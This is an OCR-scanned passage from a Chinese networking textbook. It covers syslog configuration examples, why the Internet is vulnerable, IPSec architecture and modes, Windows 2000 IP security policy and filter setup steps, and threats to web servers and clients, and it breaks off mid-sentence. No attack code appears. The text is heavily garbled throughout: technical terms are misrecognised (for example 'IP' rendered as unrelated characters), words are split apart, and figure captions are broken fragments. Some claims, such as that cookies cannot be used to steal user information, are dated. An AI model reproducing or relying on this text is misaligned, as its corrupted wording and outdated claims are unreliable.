个 给 定 消息 后 应 该 把 它 发 送 到 哪儿 。 例 如 ， 如 果 想 把 所 有 邮件 消息 记录 到 一 个 文件 中 ， 下 
面 一 行 条 目 就 可 以 了 (“ # ”指明 是 注释 )。 
#Log all the mail messages in one place 
mail.* /var/log/maillog 
其 他 设备 也 有 自己 的 日 志 。UUCP 和 news 设备 能 产生 许多 外 部 消息 。 它 可 以 把 这 些 消 
息 存 到 自己 的 日 志 (/var/log/spoolen) 中 并 把 级 别 限 为 err 或 更 高 。 例 如 : 
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# Save mail and news errors of level err and higher in aspecial file. 
uucp,news.crit /var/log/spooler 


当 一 个 紧急 消息 到 来 时 ， 可 能 想 让 所 有 的 用 户 都 得 到 ， 也 可 能 想 让 自己 的 日 志 接收 并 
保存 : 
#Everybody gets emergency messages, plus log them on anther machine 


*.emerg * 


*.emerg Qlinux.com.cn 

alert 消息 应 该 写 到 root 和 tiger 的 个 人 帐号 中 : 

#Root and Tiger get alert and higher messages 

*.alert root,tiger 

有 时 syslogd 将 产生 大 量 的 消息 。 例 如 ， 内 核 (kernel 设备 ) 可 能 很 元 长 。 用 户 可 能 想 把 
内 核 消 息 记录 到 /dev/console 中 。 下 面 的 例子 表明 内 核 日 志 记录 被 注释 掉 了 。 

#LOog all kernel messages to the console 

#Logging much else clutters UP the screen 

#kern.* /dev/console 

用 户 可 以 在 一 行 中 指明 所 有 的 设备 。 下 面 的 例子 把 info 或 更 高 级 别 的 消息 送 到 
/Var/log/messages， 除 了 mail 以 外 。 级 别 “none ”禁止 一 个 设备 。 

#Log anything (except mail)of level info or higher 


#Don't log private authentication messages! 
*.info;mail.none;authpriv.none /var/log/messages 


在 有 些 情况 下 ,可 以 把 日 志 送 到 打印 机 ,这 样 网 络 入 侵 者 怎么 修改 日 志 就 都 没有 用 了 。 
通常 要 广泛 记录 日 志 。syslog 设备 是 一 个 攻击 者 的 显著 目标 。 一 个 为 其 他 主机 维护 日 志 的 
系统 对 于 防范 服务 器 攻击 特别 脆弱 ， 因 此 要 特别 注意 。 
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本 章 要 点 


因特网 脆弱 性 根源 
卫 安全 体系 结构 
Web 安全 技术 
虚拟 专用 网 (VPN) 技 术 


8.1 因特网 安全 概述 


随 着 mnternet 的 发 展 和 网 络 上 电子 商务 、 电 子 货币 和 网 络 银行 等 新 兴业 务 的 兴起 , 越 来 
越 多 的 企业 连接 到 互联 网 ， 甚 至 通过 互联 网 来 构建 企业 的 整个 业务 模式 ，Internet 的 商业 价 
值 不 断 增 大 ， 其 安全 需求 也 变 得 更 加 迫切 。 而 且 由 于 Internet 的 开放 性 ,在 设计 时 对 于 信息 
的 保密 和 系统 的 安全 考虑 不 完备 ， 造 成 现在 因特网 上 的 攻击 与 破坏 事件 层出不穷 ， 人 们 在 
从 Internet 中 得 到 利益 的 同时 , 也 面临 着 巨大 的 风险 。 因 特 网 安全 问题 已 成 为 当今 网 络 发 展 
中 的 一 个 核心 问题 。 


8.1.1 因特网 上 的 安全 隐患 


Internet 的 安全 隐患 主要 体现 在 下 列 几 方面 。 

(1) Internet 是 一 个 开放 的 、 无 控制 机 构 的 网 络 , 黑客 经 常会 侵入 网 络 中 的 计算 机 系统 ， 
或 宝 取 机 密 数 据 和 盗用 特权 ， 或 破坏 重要 数据 ， 或 使 系统 功能 得 不 到 充分 发 挥 直 至 瘫痪 。 

(2) Internet 的 数据 传输 是 基于 TCP/IP 通信 协议 进行 的 , 而 TCP/IP 创始 者 当初 并 未 考 
虑 太 多 的 安全 问题 ， 致 使 协议 缺乏 传输 过 程 中 的 信息 不 被 窃取 的 安全 措施 。 

(3) Intemet 上 的 通信 业务 多 数 使 用 UNIX 操作 系统 来 支持 ，UNIX 操作 系统 中 明显 存 
在 的 安全 脆弱 性 问题 会 直接 影响 安全 服务 。 

(4) 在 计算 机 上 存储 、 传 输 和 处 理 的 电子 信息 ， 还 没有 像 传统 的 邮件 通信 那样 进行 信 
封 保护 和 签字 盖 章 。 信 息 的 来 源 和 去 向 是 否 真 实 ， 内 容 是 否 被 改动 ， 以 及 是 否 泄露 等 ， 在 
应 用 层 支持 的 服务 协议 中 是 赁 着 君子 协定 来 维系 的 。 

(5) 电子 邮件 存在 着 被 拆 看 、 误 投 和 伪造 的 可 能 性 ， 使 用 电子 邮件 来 传输 重要 机 密 信 
息 存 在 着 很 大 的 危险 。 

(6) 计算 机 病毒 通过 Internet 的 传播 给 上 网 用 户 带 来 极 大 的 危害 ,病毒 可 以 使 计算 机 和 
计算 机 网 络 系统 瘫痪 、 数 据 和 文件 丢失 。 病 毒 在 网 络 上 传播 可 以 通过 公共 匿名 FTP 文件 传 
播 、 也 可 以 通过 邮件 和 邮件 的 附加 文件 传播 。 
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8.1.2 因特网 的 脆弱 性 及 根源 


为 了 保证 因特网 的 安全 ， 人 们 可 说 是 层 层 设防 ， 处 处 设防 ， 耗 费 了 大 量 的 处 理 精 力 和 
代价 。 所 谓 层 层 设防 ， 表 现在 从 物理 层 到 应 用 层 ， 协 议 的 每 一 层 都 有 为 保密 而 设置 的 机 制 
和 协议 。 处 处 设防 更 是 显而易见 ， 每 个 局 域 网 (包括 终端 与 用 户 网 )， 每 个 单位 、 机 构 ， 每 
个 管理 域 ， 每 个 国家 ， 每 个 商务 平台 都 有 各 自 的 安全 系统 。 即 便 如 此 ， 人 们 仍然 对 因特网 
使 用 的 安全 性 持 怀疑 态度 。 

因特网 之 所 以 在 安全 性 上 如 此 脆弱 有 许多 方面 的 原因 , 总 的 来 说 可 以 分 以 下 三 个 方面 。 

1. 信息 传送 方式 过 于 简单 


因特网 采用 带 内 信 仿 方式， 即 控制 信息 (用 于 寻 址 的 地 址 信息 ) 与 用 户 数据 在 同一 路 由 
传输 ， 而 且 打 在 同一 个 数据 包 中 , 这 种 简单 的 自 带 寻 址 信息 数据 报 (Datagram) 的 控制 方式 带 
来 了 两 方面 的 问题 。 

(1) 用 户 信 息 很 容易 被 窃听 和 跟踪 。 窃 听 者 只 要 能 读 取 地 址 或 地 址 前 级 (用 地 址 过 滤 
器 )， 就 可 以 从 浩瀚 的 信息 流 中 将 需要 窃听 的 信息 分 离 出 来 ， 得 到 十 分 完整 的 发 送 者 地 址 、 
目的 地 址 以 及 通信 内 容 信息 。 

(2) 网 络 的 控制 与 管理 信息 与 用 户 数据 采用 同样 的 格式 与 选 路 方式 ， 走 同样 的 路 由 。 
用 户 除了 可 以 进行 正常 的 通信 外 ， 还 能 接 入 到 网 络 的 公共 设施 ， 与 公众 网 络 中 的 服务 器 、 
路 由 器 或 交换 机 进行 通信 ， 实 施 对 公共 设施 的 控制 、 修 改 、 监 视 、 破 坏 ， 或 使 公共 设施 拒 
绝 服务 ， 造 成 网 络 安全 无 可 靠 保 障 。 

2. 网 络 架构 存在 缺陷 

首先 , 表现 在 大 大 小 小 的 网 络 在 TCP/IP 基础 上 能 随意 连接 , 用 户主 机 、 网 络 公共 设施 、 
专 网 等 在 协议 上 和 接口 规范 上 都 是 平等 的 。 因 此 ， 只 要 有 能 力 识破 认证 与 加 密 ， 就 可 以 从 
网 络 的 任何 一 点 去 攻击 其 他 的 任何 对 象 ， 不 管 它 是 在 公 网 还 是 专 网 ， 而 且 常 常 难以 找到 攻 
击 者 。 其 次 ， 网 络 结构 过 分 的 开放 ， 使 黑客 不 仅 能 通过 网 络 非法 接 入 一 个 终端 、 服 务 器 或 
网 元 ， 而 且 能 深入 到 对 方 的 内 部 ， 进 入 到 操作 系统 ， 对 对 方 的 操作 系统 进行 控制 ， 这 是 十 
分 危险 的 。 一 定 的 开放 性 是 必要 的 ， 但 不 应 该 开放 到 可 轻易 进入 内 部 操作 系统 的 程度 。 系 
统 中 应 该 设 有 某 种 机 制 ， 使 外 来 信息 无 法 直接 调用 操作 系统 。 

3. 认证 的 有 效 性 不 强 

认证 是 目前 对 外 来 接 入 进行 控制 的 主要 手段 ， 它 在 某 种 程度 上 ， 确 实 起 到 了 保护 作用 。 
但 这 种 手段 有 两 方面 的 问题 : 一 是 需要 用 户 去 记 住 许多 密码 ， 而 且 密码 如 果 太 简单 容易 被 
用 枚 举 法 识破 ， 太 复杂 了 则 难以 记 住 和 容易 搞 错 ; 另 一 方面 是 它 的 非 客 观 性 ， 即 它 不 能 客 
观 地 识别 通信 方 ， 它 认 的 只 是 密码 ， 只 要 密码 正确 就 会 被 认为 是 合法 的 使 用 人 ， 但 实际 上 
密码 可 能 被 窃取 。 
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8.2 IP 安全 技术 


网 际 协议 他 是 TCP/IP 的 心脏 ,也 是 网 络 层 中 最 重要 的 协议 。IP 层 接收 由 更 低层 (网 络 
接口 层 例如 以 太 网 设备 驱动 程序 ) 发 来 的 数据 包 ， 并 把 该 数据 包 发 送 到 更 高 层 TCP 或 UDP 
层 ; 同样 ，IP 层 也 把 从 TCP 或 UDP 层 接收 来 的 数据 包 传送 到 更 低层 。 

了 王 包 本 身 没 有 任何 安全 特性 ， 攻 击 者 很 容易 伪造 瑟 包 的 地 址 、 修 改 包 内 容 、 重 播 以 前 
的 包 以 及 在 传输 途中 拦截 并 查看 包 的 内 容 。 因 此 , 我 们 收 到 的 他 数据 包 可 能 不 是 来 自 真实 
的 发 送 方 ， 包 含 的 原始 数据 可 能 遭 到 更 改 ， 原 始 数 据 在 传输 中 途 可 能 被 其 他 人 看 过 。 


8.2.1 IP 安全 概述 


IPSec 协议 是 一 个 协议 套件 , 为 卫 数据 包 中 封装 的 所 有 上 层 数据 提供 透明 的 安全 保护 ， 
无 须 修改 上 层 协议 。IPSec 的 目的 是 在 因特网 协议 栈 中 的 IP 层 提供 安全 业务 ， 为 端 系统 提 
供 相 互 身份 验证 的 方法 ， 保 护 一 条 或 多 条 主机 与 主机 间 、 安 全 网 关 与 安全 网 关 间 、 安 全 网 
关 与 主机 间 的 路 径 以 及 传输 中 的 数据 不 被 窃取 和 攻击 。 它 使 系统 能 按 需 选择 安全 协议 ， 决 
定 服务 所 使 用 的 算法 及 放置 需求 服务 所 需 密 钥 到 相应 位 置 。 

使 用 IPSec 可 以 防范 以 下 几 种 网 络 攻击 。 

(1) Sniffer: IPSec 对 数据 进行 加 密 对 抗 Sniffer， 保 证 数据 的 机 密 性 。 

(2) 数据 算 改 : IPSec 用 密 钥 为 每 个 人 P 包 生 成 一 个 消息 验证 码 (MAC)， 该 密 钥 为 且 仅 
为 数据 的 发 送 方 和 接收 方 共享 。 对 数据 包 的 任何 算 改 ， 接 收 方 都 能 够 检测 ， 保 证 了 数据 的 
完整 性 。 

(3) 身份 欺骗 : IPSec 的 身份 交换 和 认证 机 制 不 会 暴露 任何 信息 , 依赖 数据 完整 性 服务 
实现 了 数据 发 送 源 认证 。 

(4) 重 放 攻 击 : IPSec 防止 了 数据 包 被 捕获 并 重新 投放 到 网 上 , 即 目的 地 会 检测 并 拒绝 
老 的 或 重复 的 数据 包 ， 它 通过 与 AH 或 ESP 一 起 工作 的 序列 号 实现 。 

(5) 拒绝 服务 攻击 : IPSec 依据 人 P 地 址 范围 、 协 议 、 甚 至 特定 的 协议 端口 号 来 决定 哪 
些 数据 流 需要 受到 保护 ， 哪 些 数据 流 可 以 被 允许 通过 ， 哪 些 需要 拦截 。 


8.2.2 IP 安全 体系 结构 

1. 目标 和 服务 

针对 Internet 的 安全 需求 ，IETF 于 1998 年 11 月 颁布 了 IP 层 安全 协议 IPSec。 其 目标 
是 为 IPv4 和 IPv6 提供 具有 较 强 互 操 作 能 力 、 高 质量 和 基于 密码 的 安全 ， 在 IP 层 实现 多 种 
安全 服务 。IPSec 能 提供 的 安全 服务 集 包括 访问 控制 、 无 连接 的 完整 性 、 数 据 源 认证 、 拒 绝 
重 发 包 (部 分 序列 完整 性 形式 )、 保密 性 和 有 限 传输 流 保密 性 。 因为 这 些 服务 均 在 IP 层 提供 ， 
所 以 任何 高 层 协议 均 能 使 用 它们 ， 例 如 TCP、UDP、ICMP、BGP 等 。 

IPSec 体系 结构 及 各 组 件 间 的 相互 关系 如 图 8-1 所 示 。IPSec 组 件 包括 安全 协议 认证 头 
(AH) 和 封装 安全 载荷 协议 (ESP)、 安 全 关联 (SA)、 密 钥 交 换 (IKE) 及 加 密 和 验证 算法 等 。 


J ER 


8-1 IPSec 体系 结构 及 各 组 件 间 的 相互 关系 


e ”安全 体系 结构 :包含 了 一 般 的 概念 、 安 全 需求 、 定 义 和 定 义 IPSec 的 技术 机 制 ; 
封装 安全 载荷 协议 (ESP): 覆盖 了 为 了 包 加 密 (可 选 身 份 验证 ) 与 ESP 的 使 用 相关 的 
包 格 式 和 常规 问题 ; 

验证 头 AH 协议 : 包含 使 用 AH 进行 包 身份 验证 相关 的 包 格 式 和 一 般 问 题 ; 

加 密 算法 : 描述 各 种 加 密 算法 如 何 用 于 ESP 中 ; 

验证 算法 : 描述 各 种 身份 验证 算法 如 何 用 于 AH 中 和 ESP 身份 验证 选项 ; 

密 钥 管理 : 密 钥 管理 的 一 组 方案 ， 其 中 IKE 是 默认 的 密 钥 自 动 交换 协议 ，IKE 适 
合 为 任何 一 种 协议 协商 密 钥 ， 并 不 仅 限于 IPSec 的 密 钥 协商 ， 协 商 的 结果 通过 解 
释 域 (PSec DOT) 转化 为 IPSec 所 需 的 参数 ; 

。 解释 域 DOI: 彼此 相关 各 部 分 的 标识 符 及 运作 参数 。 

IPSec 使 用 两 个 协议 来 提供 安全 性 : 数据 包头 认证 协议 (AH) 和 封装 安全 载荷 协议 (ESP)。 
ESP 存在 两 种 情况 : 提供 验证 选项 和 不 提供 验证 选项 。AH 和 ESP 都 是 数据 包 访 问安 全 控 
制 描述 ， 用 于 实现 加 密 密 钥 发 布 和 安全 协议 有 关 的 管理 。 表 8-1 显示 了 AH 和 ESP 协议 提 
供 的 服务 。 


表 8-1 AH 和 ESP 协议 提供 的 服务 


加 密 并 验证 


访问 控制 
无 连接 的 完整 性 


(> 网络 安全 管理 与 维 扩 


高 
职 
高 
专 
: 
材 
计 
算 
机 
系 
列 


续 表 


数据 源 认 证 

防止 重 放 的 数据 包 

载荷 保密 性 

有 限 传输 流 保密 性 
2. 传送 模式 与 隧道 模式 
IPSec 协议 (包括 AH 和 ESP) 既 可 用 来 保护 一 个 完整 的 人 P 载荷 ， 也 可 用 来 保护 某 个 人 

载荷 的 上 层 协 议 。 这 两 方面 的 保护 分 别 是 由 IPSec 两 种 不 同 的 模式 来 提供 的 。 如 图 8-2 所 

示 。 其 中 ， 传 输 模 式 用 来 保护 IP 的 上 层 协议 ;而 隧道 模式 (通道 模式 ) 用 来 保护 整个 卫 数据 

包 。 两 种 人 PSec 协议 (AH 和 ESP) 均 能 同时 以 传送 模式 或 隧道 模式 工作 。 

。 “传输 模式 : 在 IPv4 中 , 传输 模式 的 IPSec 头 插入 到 卫 报头 之 后 、 高层 传输 协议 (如 
TCP、UDP) 之 前 。 在 IPv6 中 ， 该 模式 的 IPSec 头 出 现在 他 头 及 他 扩 展 头 之 后 、 
高 层 传输 协议 之 前 。 

。 ”隧道 模式 ， 要 保护 的 整个 人 P 包 都 需 封 装 到 另 一 个 人 P 数据 报 里 ， 同 时 在 外 部 与 内 
部 下 头 之 间 插 入 一 个 PSec 头 。 外 部 他 头 指明 进行 PSec 处 理 的 目的 地 址 ， 内 部 
全 头 指 明 最 终 的 目的 地 址 。 若 构成 一 个 安全 联盟 的 两 个 终端 中 至 少 有 一 个 是 安全 
网 关 ( 而 不 再 是 主机 ), 则 这 个 安全 联盟 就 必须 采用 隧道 模式 。 在 隧道 模式 下 , IPSec 
报 文 要 进行 分 段 和 重组 操作 ， 并 且 可 能 要 再 经 过 多 个 安全 网 关 才 能 到 达 安 全 网 关 
后 面 的 目的 主机 。 


原始 的 耳 包 ; 
传输 模式 受 保护 的 包 : 
隧道 模式 受 保护 的 包 


图 8-2 IPSec 传输 模式 和 隧道 模式 


3. 安全 关联 (SA) 


安全 关联 (Security Association，SA) 是 指 由 IPSec 提供 安全 服务 的 数据 流 的 发 送 者 到 接 
收 者 的 一 个 单 向 逻辑 关系 , 用 于 表示 IPSec 如 何 为 SA 所 承载 的 数据 通信 提供 安全 服务 , 其 
方式 是 使 用 AH 或 ESP。 一 个 SA 不 能 同时 使 用 AH 和 ESP 两 种 保护 措施 。 简 单 地 说 ，SA 
是 两 个 应 用 IPSec 实体 (主机 、 路 由 器 ) 间 的 一 个 单 向 逻辑 连接 ， 决 定 保护 什么 、 如 何 保护 以 
及 谁 来 保护 通信 数据 的 问题 。 

-个 安全 关联 是 由 三 个 参数 来 唯一 标识 的 。 

Q@ ”安全 参数 索引 (SPD: 该 索引 存在 于 IPSec 协议 头 内 ，32 位 ， 只 在 本 地 有 意义 。 

@ ”IPSec 协议 值 : 指出 SA 使 用 的 协议 类 型 (AH 或 ESP)。 

@ 目标 下 地 址 : 即 SA 中 接收 实体 的 他 地 址 ， 该 地 址 可 以 是 终端 用 户 的 系统 地 址 ， 
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也 可 以 是 防火 墙 或 安全 网 关 等 网 络 设备 的 地 址 。 
因此 ， 在 任何 卫 数据 包 中 ， 安 全 关联 是 由 JIPv4 和 IPv6 首部 的 目的 地 址 和 包装 的 扩展 
首部 (AH 或 ESP) 中 的 安全 参数 索引 来 唯一 标识 的 。 


8.2.3 Windows 2000 的 IPSec 技术 


对 于 在 本 地 计算 机 上 存储 的 重要 数据 ， 我 们 可 以 利用 很 多 途径 米 对 它 进行 一 系列 的 保 
护 。 但 是 ， 当 数据 在 网 络 上 传输 时 ， 不 会 被 加 密 。 这 时 候 怎么 办 ? Windows 2000 的 外 安 
全 特性 解决 了 这 个 问题 。 

Windows 2000 Server 操作 系统 中 也 提供 了 IPSec 技术 ， 它 是 一 种 基于 点 到 点 的 安全 模 
型 ， 可 以 实现 更 高 层次 局 域 网 数据 的 安全 性 ， 简 化 了 网 络 安全 调度 和 管理 。 

1. 创建 IP 安全 策略 


在 网 络 上 传输 数据 的 时 候 ， 通过 创建 人 P 安全 策略 ， 利 用 点 到 点 的 安全 模型 ， 能 够 安全 
有 效 地 把 源 计算 机 的 数据 传输 到 目标 计算 机 。 下 面 是 创建 P 安全 策略 的 方法 。 

(1) 选择 “开始 ”|“ 运 行 ”命令 ， 在 “运行 ”对 话 框 的 “打开 ”文本 框 中 输入 mme， 
单 击 “ 确 定 ”按钮 ， 打 开 “ 控 制 台 ”窗口 ， 如 图 8-3、 图 8-4 所 示 。 
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8-3 “运行 ”对 话 框 


m 控制 台 1 - [控制 台 根 节点 ] 
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ETIEEEE 


图 8-4 “控制 台 ” 窗 口 


(2) 选择 “控制 台 ” 菜 单 中 的 “添加 /删除 管理 单元 ”命令 ， 弹 出 “添加 /删除 管理 单元 ” 
对 话 框 ， 如 图 8-5 所 示 。 
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图 8-5 “添加 /删除 管理 单元 ”对 话 框 
(G3) 单 击 “ 独 立 ” 选 项 卡 中 的 “添加 ”按钮 ， 弹 出 “添加 独立 管理 单元 ”对 话 框 。 在 
“可 用 的 独立 管理 单元 ”列表 框 中 选择 “了 安全 策略 管理 ”， 如 图 8-6 所 示 。 


添加 独立 管理 单元 
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FrontPage Server Extensions 
询 Internet 信息 服务 Microsoft Corpora .. 


Internet 验证 服务 GAS) Microsoft Corpora... 

gos 许可 控制 Microsoft Corpora 

Web 地 址 的 链接 

MTNS ierosoft Corpora .. 
省 WNI 控件 


Mierosoft Corpore .. 


图 8-6 “添加 独立 管理 单元 ”对 话 框 
(4) 单 击 “ 添 加 ”按钮 ， 弹 出 “选择 计算 机 ”对 话 框 ， 并 利用 各 个 单 选 按 钮 确定 当前 
卫 安全 策略 待 管理 的 计算 机 ， 可 以 将 管理 范围 设置 为 : 本 地 计算 机 、 管 理 此 计算 机 所 在 域 
的 域 策略 、 管 理 另 一 域 的 域 策略 或 另 一 台 计 算 机 ， 如 图 8-7 所 示 。 


选择 这 个 管理 单元 要 管理 的 计算 机 
当 保存 这 个 控制 台 时 ， 也 会 保存 | 


图 8-7 “选择 计算 机 ”对 话 框 


图 8-8 “添加 /删除 管理 单元 ”对 话 框 


2. 设置 IP 过 滤器 


卫 安全 属性 的 每 一 个 组 成 部 分 都 称 为 安全 策略 , 而 卫 过 滤器 又 是 安全 策略 中 的 重要 组 
成 部 分 ， 因 此 设置 人 P 过 滤器 对 保护 网 络 数据 的 传输 有 着 极为 重要 的 作用 。 

1) 添加 新 他 过 滤器 

(1) 选择 “开始 ”|“ 运 行 ”命令 ， 在 “运行 ”对 话 框 的 “打开 ”文本 框 中 输入 mmc， 
单 击 “ 确 定 ”按钮 ， 打 开 “ 控 制 台 ” 窗 口 ， 如 图 8-9 所 示 。 
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图 8-9 “控制 台 ” 窗 口 


(2) 在 “控制 台 ” 窗 口 左 侧 “ 控 制 台 根 节点 ”下 的 “IP 安全 策略 ， 在 本 地 机 器 ”上 右 
击 ， 然 后 在 弹出 的 快捷 菜单 中 选择 “管理 他 筛选 器 表 和 筛选 器 操作 ”命令 ， 打 开 “ 管 理 下 
筛选 器 表 和 筛选 器 操作 ”对 话 框 ， 如 图 8-10 所 示 。 


管理 IP 和 范 选 器 表 和 第 寺 器 抬 作 


图 8-10 “管理 IP 筛选 器 表 和 筛选 器 操作 ”对 话 框 


(3) 在 “管理 耳 筛选 器 列表 ”选项 卡 中 单 击 “ 添 加 ”按钮 ， 弹 出 “IP 筛选 器 列表 ”对 
话 框 ， 在 “名 称 ” 文 本 框 中 输入 新 创建 PP 过 滤器 的 名 称 (如 “我 的 他 地 址 ”) 并 单 击 “ 添 加 ” 
按钮 ， 然 后 单 击 “ 确 定 ” 按 钮 ， 如 图 8-11 所 示 。 

(4) 在 弹出 的 对 话 框 的 “ 源 地 址 ”中 输入 服务 器 的 他 地 址 和 子 网 掩 码 , 单 击 “ 下 一 步 ” 
按钮 ， 如 图 8-12 所 示 。 

(5) 在 弹出 的 对 话 框 的 “目标 地 址 ”中 输入 客户 端的 他 地址 和 子 网 掩 码 ， 单 击 “ 下 一 
步 ”按钮 ， 如 图 8-13 所 示 。 


IP 籍 选 器 列表 


图 8-11 “IP 筛选 器 列表 ”对 话 框 


往 先 器 向 导 


图 8-12 “IP 通信 源 ” 设 置 界面 


芋 选 器 向 导 


图 8-13 “IP 通信 目标 ”设置 界面 
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(6) 在 弹出 的 如 图 8-14 所 示 对 话 框 的 “选择 协议 类 型 ”下拉 列 表 框 中 一 般 选择 “TCP/IP” 
协议 。 单 击 “ 下 一 步 ”按钮 。 


将 选 器 向 导 


图 8-14 “IP 协议 类 型 ”设置 界面 
(7) 设置 “了 协议 端口 ”， 单 击 “ 下 一 步 ”按钮 ， 如 图 8-15 所 示 。 


be 


IP 协议 端口 
大 多 数 IP 网 络 协议 建立 在 常用 的 IF 端口 上 。 


图 8-15 “IP 协议 端口 ”设置 界面 


(8) 完成 “IP 筛选 器 向 导 ”， 单 击 “ 完 成 ”按钮 ， 如 图 8-16 所 示 。 

2) ”编辑 已 有 也 过 滤器 

(1) 在 如 图 8-11 所 示 的 对 话 框 中 单 击 “ 编 辑 ” 按 钮 ， 弹 出 “IP 筛选 器 列表 ”对 话 框 。 

(2) 在 “IP 筛选 器 列表 ”对 话 框 中 单 击 “ 编 辑 ” 按 钮 ， 弹 出 “筛选 器 属性 ”对 话 框 ， 
利用 对 话 框 中 的 “ 寻 址 ”、“ 协 议 ”、“ 描 述 ”选项 卡 更 改 指 定 筛选 器 列表 的 属性 设置 。 
例如 : 利用 “ 寻 址 ”选项 卡 可 以 更 改正 通信 的 源 地 址 和 目标 地 址 设置 ， 如 图 8-17 所 示 。 
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请 按 “ 完 成 ”来 关闭 此 向 导 。 
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图 8-16 “完成 IP 筛选 器 向 导 ” 设 置 界面 
相对 
寻 址 | 协议 | 描 术 | 


Ri 7] 


三 目标 地 址 四 ) 
任何 IP 地 址 S| 


灰 镜像 。 同 时 匹配 具有 正好 相反 的 源 和 目标 地 址 的 数据 包 QQ)。 


8-17 “ 寻 址 ”选项 卡 

(3) 利用 对 话 框 中 定义 的 单 选 按钮 、 安 全 措施 首选 顺序 列表 以 及 复 选 框 组 设置 筛选 器 
操作 ， 用 户 可 以 根据 自己 的 需要 合理 设置 筛选 器 ， 单 击 “ 确 定 ” 按 钮 即 可 ， 如 图 8-18 所 示 。 
这 样 ， 通 过 创建 IP 安全 策略 和 合理 设置 人 P 过 滤器 ， 能 有 效 地 保证 数据 在 网 络 传输 过 程 中 
的 安全 性 。 

3) ”编辑 指定 筛选 器 

(1) 在 如 图 8-10 所 示 的 “管理 人 P 筛选 器 表 和 筛选 器 操作 ”对 话 杠 中， 切换 到 “管理 
IP 筛选 器 列表 ”选项 卡 ， 在 “IJP 筛选 器 列表 ”列表 框 中 选择 待 编辑 其 属性 设置 的 筛选 器 操 
作 ， 如 “所 有 下 通讯 ”， 如 图 8-19 所 示 。 

(2) 单 击 “ 编 辑 ” 按钮 ， 弹 出 “*( 筛 选 器 操作 名 称 ) 属 性 ”( 如 “所 有 下 通讯 ”) 对 话 框 ， 
如 图 8-20 所 示 。 
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图 8-18 “协议 ”选项 卡 


图 8-20 设置 “所 有 IP 通讯 ” 
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8.3 Web 安全 技术 


WWW 服务 又 称 Web 服务 ,是 建立 在 HTTP( 超 文本 传输 协议 ) 上 的 全 球 信息 库 , 又 是 
Intemet 上 HITP 服务 器 的 集合 , 在 短 时 间 内 得 到 迅 狐 发展, 是 人 们 最 常用 的 Internet 服务 。 
随 着 Web 应 用 程序 的 增多 ， 随 之 而 来 的 就 是 这 些 Web 应 用 程序 所 带 来 的 安全 漏洞 。Web 
站 点 被 黑客 入 侵 的 事件 展 有 发 生 ，Web 安全 问题 已 引起 人 们 的 极 大 重视 。 


8.3.1 Web 安全 分 析 


来 自 网 络 上 的 安全 威胁 与 攻击 多 种 多 样 ， 依 照 Web 访问 的 结构 ， 可 将 其 分 为 对 Web 
服务 器 的 安全 威胁 、 对 Web 客户 机 的 安全 威胁 和 对 通信 信道 的 安全 威胁 三 类 。 


1. 对 Web 服务 器 的 安全 威胁 


因为 Web 服务 器 、 操 作 系统 服 务 器 、 数 据 库 服务 器 都 有 可 能 存在 漏洞 ， 所 以 恶意 用 户 
有 可 能 利用 这 些 漏 洞 去 获得 重要 信息 。Web 服务 器 上 的 漏洞 可 以 从 以 下 几 方 面 考虑 。 
。 在 Web 服务 器 上 的 机 密 文 件 或 重要 数据 (如 存放 用 户 名 、 口 令 的 文件 ) 放 置 在 不 安 
全 区 域 ， 被 入 侵 后 很 容易 得 到 。 

。 在 Web 数据 库 中 ， 如 果 数 据 库 安全 配置 不 当 ， 保 存 的 有 价值 信息 (如 商业 机 密 数 
据 、 用 户 信息 等 )， 很 容易 泄密 。 

。 Web 服务 器 本 身 存 在 一 些 漏洞 ， 如 果 被 黑客 利用 侵入 到 系统 ， 将 会 破坏 一 些 重要 
的 数据 ， 甚 至 造成 系统 瘫痪 。 

。 ”程序 员 有 意 或 无 意 的 在 系统 中 遗漏 Bugs 给 非法 黑客 创造 条 件 。 如 用 CGI 脚本 编 
写 的 程序 中 的 自身 漏洞 。 

2. 对 Web 客户 机 的 安全 威胁 

现在 网 页 中 的 活动 内 容 已 被 广泛 应 用 , 活动 内 容 的 不 安全 性 是 造成 客户 端的 主要 威胁 。 
网 页 的 活动 内 容 是 指 在 静态 网 页 中 嵌入 的 对 用 户 透 明 的 程序 ， 它 可 以 完成 一 些 动作 ， 显 示 
动态 图 像 ， 下 载 和 播放 音乐 、 视 频 等 。 当 用 户 使 用 浏览 器 查看 带 有 活动 内 容 的 网 页 时 ， 这 
些 应 用 程序 会 自动 下 载 并 在 客户 机 上 运行 ， 如 果 这 些 程序 被 恶意 使 用 ， 则 可 以 窃取 、 改 变 
或 删除 客户 机 上 的 信息 。 主 要 用 到 Java Applet 和 ActiveX 技术 。 

Java Applet 使 用 Java 语言 开发 ， 随 页 面 下 载 。Java 使 用 沙 盒 (Sandbox) 根 据 安全 模式 所 
定义 的 规则 来 限制 Java Applet 的 活动 ， 它 不 会 访问 系统 中 规定 安全 范围 之 外 的 程序 代码 。 
但 事实 上 Java Applet 存在 安全 漏洞 ， 可 能 被 利用 进行 破坏 。 

ActiveX 是 微软 的 一 个 控件 技术 , 它 封装 由 网 页 设计 者 放 在 网 页 中 以 执行 特定 的 任务 的 
程序 ， 可 以 由 微软 支持 的 多 种 语言 开发 但 只 能 运行 在 Windows 平台 。ActiveX 在 安全 性 上 
不 如 Java Applet， 一 旦 下 载 ， 能 像 其 他 程序 一 样 执 行 ， 访 问 包括 操作 系统 代码 在 内 的 所 有 
系统 资源 ， 这 是 非常 危险 的 。 

Cookie 是 Netscape 公司 开发 的 ， 用 来 改善 HTTP 的 无 状态 性 。 无 状态 的 表现 使 得 制造 
像 购 物 车 这 样 要 在 一 定时 间 内 记 住 用 户 动作 的 东西 很 难 。Cookie 实际 上 是 一 段 小 消息 ， 在 
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浏览 器 第 一 次 连接 时 由 HTTP 服务 器 送 到 浏览 器 端 ， 以 后 浏览 器 每 次 连接 都 把 这 个 Cookie 
的 一 个 副本 返回 给 Web 服务 器 ， 服 务 器 用 这 个 Cookie 来 记忆 用 户 和 维护 一 个 跨 多 个 页 面 
的 过 程 影像 。Cookie 不 能 用 来 窃取 关于 用 户 或 用 户 计算 机 系统 的 信息 ， 它 们 只 能 在 某 种 程 
度 上 存储 用 户 的 信息 , 如 计算 机 名 字 、 耳 地 址 、 浏 览 器 名 称 和 访问 的 网 页 的 URL 等 。 所 以 ， 
Cookie 是 相对 安全 的 。 

3. 对 通信 信道 的 安全 威胁 

Internet 是 连接 Web 客户 机 和 服务 器 通信 的 信道 ， 是 不 安全 的 。 像 Sniffer 这 样 的 嗅 探 
程序 ， 可 对 信道 进行 侦 听 ， 窃 取 机 密 信 息 ， 对 保密 性 存在 着 安全 威胁 。 未 经 授权 的 用 户 可 
